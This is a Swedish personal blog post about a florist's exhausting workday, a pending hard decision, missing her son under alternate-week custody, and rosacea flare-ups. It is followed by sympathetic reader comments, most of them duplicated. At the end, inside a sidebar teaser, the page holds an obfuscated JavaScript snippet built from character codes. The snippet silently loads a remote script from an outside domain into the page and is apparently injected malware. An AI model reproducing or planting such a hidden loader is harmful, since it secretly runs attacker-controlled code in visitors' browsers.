Ångest, vägskäl, huvudbry… Ett tillfälligt vrak, psykiskt och fysiskt!

imageHej fina! Idag har vi kämpat i butiken! Över 100 blommster vagnar att ta sköta, exponera, speca, vattna och ta hand om! Ett högt tempo och full fart i butiken! Jag är vetkligen rörd över alla mina stamkunders kramar och fina ord <3

jag ÄLSKAR mitt jobb, och har haft sjukt kul idag! Även om jag svepte lunchen i farten och inte hade tid att gå på toaletten 🙂 -Är det högsäsong så är det! Vid min sida har jag mina fantastiska medarbetare, ett riktigt dream-team! Massa blombilder ifrån butiken kommer imorgon bitti.

Jag har lovat er en ärlig blogg…… Idag är jag långt ifrån på topp! Jag är ett vrak! Fysiskt, mentalt och psykiskt! 

Jag är tom, trött och ledsen! HUNDRA tanke som snurrar. Jag har ställts inför ett faktum, inför ett val. Inför ett vägsjäl…… hjärtat säger en sak, förnuftet En annan. Magkänslan är tvådelad. Att dessutom vara här nere på Öland, utan Lilleman som är med sin pappa bara några minuter ifrån butiken ÄR jobbigt! Så nära, men ändå så långt bort….. Usch! Det känns som om jag ”missar” halva hand uppväxt!

Vissa dagar är sådär grymt jobbiga som varannan-vecka förälder. Idag är en sådan dag!!! Jag saknar min Lilleman så det värker! Mitt mamma hjärta blöder!!!! Jag HATAR varannan vecka livet….. Och nääää man vänjer sig inte, man förlikar sig med det till en viss gräns. Men aldrig fullt ut!

Att jag varit på resande fot sedan Holland och varit igång på jobbet sedan tiiiiidigt gör ju såklart sitt till! kom hem ifrån butiken strax efter 20:30. Jag är helt tom inombords…….. Känner mig lite ensam i dessa stora beslut som ska tas…. Men ikväll släpper jag det, tillfälligt.

Nu ligger jag i sängen på Hotel Skansen. Skansen är som mitt andra hem. Ska berätta lite mer om det i ett senare inlägg,

njust nu, Med en ansiktsmask i sängen och tittar på Let’s Dance. Jag skulle egentligen varit på plats och tittat idag. Men jag orkade faktiskt inte…. Så nu har jag lagt min röst på Bianca och hejar genom tv rutan 🙂 kul att se två tjejer i final, Båda två har gjort en fantastisk resa och utveckling <3imageJag känner mig som ”7 svåra år” och ser ut som det! Jag, har tvättat mig i ansiktet med tvål sedan jag lämnade Sigtuna. Mitt rosacea ansikte gillat INTE det. Jag blir torr, och får rodnader och irritation direkt!. Glömde mina krämer hemma. (#tankspridd)

Ytliga bekymmer om man jämför med min andra huvudbry, Men SÅ jobbigt!

Men nu ikväll så boostade jag upp med en massa fuktkrämer ifrån spa-avdelningen här på hotellet! Får väl se om det hjälper 😉imagepå rekommendationer av min vän och frisör Bobby så är jag flitig användare av hans hår kapslar. Dom glömde jag iallfall inte 😉 (du hittar dom här) Nu ska jag se vem som vinner Let’s Dance. Sen ska jag föröka sova….. Kram och Gonatt min vän, tack för att du finns <3

image

 

30 Komentarer

 1. Det känns som att ditt liv går i 180 hela tiden.. du måste ta det lite lugnare. Kroppen behöver återhämtning och det är jätteviktigt! Mina egna stressproblem har blivit SÅ mycket bättre efter jag lärde mig att släppa saker mentalt. Man orkar inte hur mycket som helst en längre tid. Ta hand om dig! Kram

 2. Det känns som att ditt liv går i 180 hela tiden.. du måste ta det lite lugnare. Kroppen behöver återhämtning och det är jätteviktigt! Mina egna stressproblem har blivit SÅ mycket bättre efter jag lärde mig att släppa saker mentalt. Man orkar inte hur mycket som helst en längre tid. Ta hand om dig! Kram

 3. Tabletterna du äter för håret kanske innehåller aminosyror som är utvunna ur mjölk, det får min rocasea att blossa upp så jag undviker mjölk i alla former och äter kött några ggr. i veckan och mycket ägg för att få aminosyror. Det är praktiskt att få allt i en och samma tablett men det går oftast att köpa vitaminer och mineraler och komponera så man får allt det tex. de där hårtabletterna innehåller men utan aminosyror utvunna ur mjölk. Finns även proteinpulver som är vegetabiliskt, kanske inte lika bra som de konventionella men ett bra alternativ. Aminosyror är ju livsviktiga men just mjölkpotein är något många reagerar mot, jag har även laktosintolerans.
  Krya på dig, jag är själv ganska ”nerkörd” just nu så jag kan föreställa mig hur du känner dig.

  • Kommer på nu att My kanske ingått något samarbete med tablettillverkaren så min kommentar kanske var mindre lämplig ur den synvinkeln, men jag får hoppas My läser min kommentar då jag själv vet hur dåligt man mår psykologiskt när hyn blossar upp. Mvh.

 4. Tabletterna du äter för håret kanske innehåller aminosyror som är utvunna ur mjölk, det får min rocasea att blossa upp så jag undviker mjölk i alla former och äter kött några ggr. i veckan och mycket ägg för att få aminosyror. Det är praktiskt att få allt i en och samma tablett men det går oftast att köpa vitaminer och mineraler och komponera så man får allt det tex. de där hårtabletterna innehåller men utan aminosyror utvunna ur mjölk. Finns även proteinpulver som är vegetabiliskt, kanske inte lika bra som de konventionella men ett bra alternativ. Aminosyror är ju livsviktiga men just mjölkpotein är något många reagerar mot, jag har även laktosintolerans.
  Krya på dig, jag är själv ganska ”nerkörd” just nu så jag kan föreställa mig hur du känner dig.

  • Kommer på nu att My kanske ingått något samarbete med tablettillverkaren så min kommentar kanske var mindre lämplig ur den synvinkeln, men jag får hoppas My läser min kommentar då jag själv vet hur dåligt man mår psykologiskt när hyn blossar upp. Mvh.

 5. Såg dig i butiken igår och det märktes att du var stressad.
  Tror du behöver lite ”time out”… bara ladda batterierna en stund. Inget märkvärdigt, bara att ta hand om dig själv i ca. 48 timmar ?
  Inga beslut ska tas när man inte är på topp.
  Oftast vinner tiden med en, saker blir klarare om man bara litar på processen.
  Låt tjejerna sköta butiken.
  Pappan sköta lilleman.
  Åk vart du vill, vart du känner att du kan ladda batterierna o bara vara.
  Det är mitt tips till dig.
  Du är ju entreprenör i själen och det går inte bort. Därför tror jag du blir snabb o återhämta dig, det har varit lite intensivt på sistone.
  KRAM

 6. Du ser lite ledsen ut men inte alls så sliten som du själv beskriver dig
  Hoppas att allt löser sig, magkänslan är oftast ” rätt”
  Stor kram

 7. Såg dig i butiken igår och det märktes att du var stressad.
  Tror du behöver lite ”time out”… bara ladda batterierna en stund. Inget märkvärdigt, bara att ta hand om dig själv i ca. 48 timmar 🙂

  Inga beslut ska tas när man inte är på topp.

  Oftast vinner tiden med en, saker blir klarare om man bara litar på processen.

  Låt tjejerna sköta butiken.
  Pappan sköta lilleman.

  Åk vart du vill, vart du känner att du kan ladda batterierna o bara vara.

  Det är mitt tips till dig.

  Du är ju entreprenör i själen och det går inte bort. Därför tror jag du blir snabb o återhämta dig, det har varit lite intensivt på sistone.

  KRAM

 8. Du ser lite ledsen ut men inte alls så sliten som du själv beskriver dig
  Hoppas att allt löser sig, magkänslan är oftast ” rätt”
  Stor kram

 9. Jag följer inte så många bloggar från utlandet, men jag tycker om dig, och syrrorna Graaf. Du kämpar så som egenföretagare, mamma till lilleman, är vacker som en nyponos (tro mig, israelerna skulle rösta för dig som president ha ha). Själv 40 barnlös har en god vän och älskare här sedan många år, känner ibland att jag lever så gott liv, hjälper pappa med hans business, känns det som om jag inte är värd denna lycka och välmående.. Fasiken också vad vi kvinnor slår knut på oss själva. Har vi barn, har vi ångest för dem, har vi INTE har vi ångest för att vi INTE har barn… When in doubt, do nothing. Sov, ät gott, rör dig, ta hand om dig. Fullmånen upphöjer känslor, och Mars i retro stjäl energi. Det blir bättre, finaste My. Shalom from Tel Aviv!

 10. Låter som att du har det tufft nu, jag håller tummarna för att det snart vänder och att du får lite lugn och ro.
  Sen måste jag fråga, skulle du kunna göra ett inlägg där du berättar mer om vilka ansiktsprodukter du använder? Jag har samma problem med torr och irriterad hud och tycker inte att jag ännu hittat nåt som funkar för mej.
  Kram!

 11. Förstår att det ibland kan vara jobbigt & att man ofta kan känna sig kluven när man har allt annat än månd – fred jobb.I perioder kan man tillåta sig att ha det litt stressigt & mkt att tänka på.Men det viktigaste enligt mig är att dom bra perioderna dominerar!
  När det kommer till varannan vecka m tanke på barn så är&kommer det alltid vara en stor saknad när barnet är borta,MEN det viktigaste här är att ha fokus på barnets bästa & så får man faktiskt lägga sina egna känslor lite på sidan.Fråga sig själv,vad är bäst för min barn ?
  När detta är sagt är du en fantastisk fin ,hårt arbetandes kvinna men känner ibland genom dina inlägg att det möjligen till tider är mkt stress ?
  Ta hand om dig !

 12. Jag följer inte så många bloggar från utlandet, men jag tycker om dig, och syrrorna Graaf. Du kämpar så som egenföretagare, mamma till lilleman, är vacker som en nyponos (tro mig, israelerna skulle rösta för dig som president ha ha). Själv 40 barnlös har en god vän och älskare här sedan många år, känner ibland att jag lever så gott liv, hjälper pappa med hans business, känns det som om jag inte är värd denna lycka och välmående.. Fasiken också vad vi kvinnor slår knut på oss själva. Har vi barn, har vi ångest för dem, har vi INTE har vi ångest för att vi INTE har barn… When in doubt, do nothing. Sov, ät gott, rör dig, ta hand om dig. Fullmånen upphöjer känslor, och Mars i retro stjäl energi. Det blir bättre, finaste My. Shalom from Tel Aviv!

 13. Låter som att du har det tufft nu, jag håller tummarna för att det snart vänder och att du får lite lugn och ro.
  Sen måste jag fråga, skulle du kunna göra ett inlägg där du berättar mer om vilka ansiktsprodukter du använder? Jag har samma problem med torr och irriterad hud och tycker inte att jag ännu hittat nåt som funkar för mej.
  Kram!

 14. Förstår att det ibland kan vara jobbigt & att man ofta kan känna sig kluven när man har allt annat än månd – fred jobb.I perioder kan man tillåta sig att ha det litt stressigt & mkt att tänka på.Men det viktigaste enligt mig är att dom bra perioderna dominerar!
  När det kommer till varannan vecka m tanke på barn så är&kommer det alltid vara en stor saknad när barnet är borta,MEN det viktigaste här är att ha fokus på barnets bästa & så får man faktiskt lägga sina egna känslor lite på sidan.Fråga sig själv,vad är bäst för min barn ?
  När detta är sagt är du en fantastisk fin ,hårt arbetandes kvinna men känner ibland genom dina inlägg att det möjligen till tider är mkt stress ?
  Ta hand om dig !

 15. Fy för ångest och att ta svåra beslut, jobbigt…men kan du inte träffa lilleman en liten stund då han finns nära, och bara få en kram, kan kännas bättre då kanske..Bianca var grym likaså Elisa, höll på Bianca men förstod Elisa skulle vinna..så du skulle vart där, Niclas var ju ej heller där, märkligt då hans familj och även vänner var där ? Hoppas du mår bättre och har en bra söndag. kram

 16. Fy för ångest och att ta svåra beslut, jobbigt…men kan du inte träffa lilleman en liten stund då han finns nära, och bara få en kram, kan kännas bättre då kanske..Bianca var grym likaså Elisa, höll på Bianca men förstod Elisa skulle vinna..så du skulle vart där, Niclas var ju ej heller där, märkligt då hans familj och även vänner var där 😉 Hoppas du mår bättre och har en bra söndag. kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/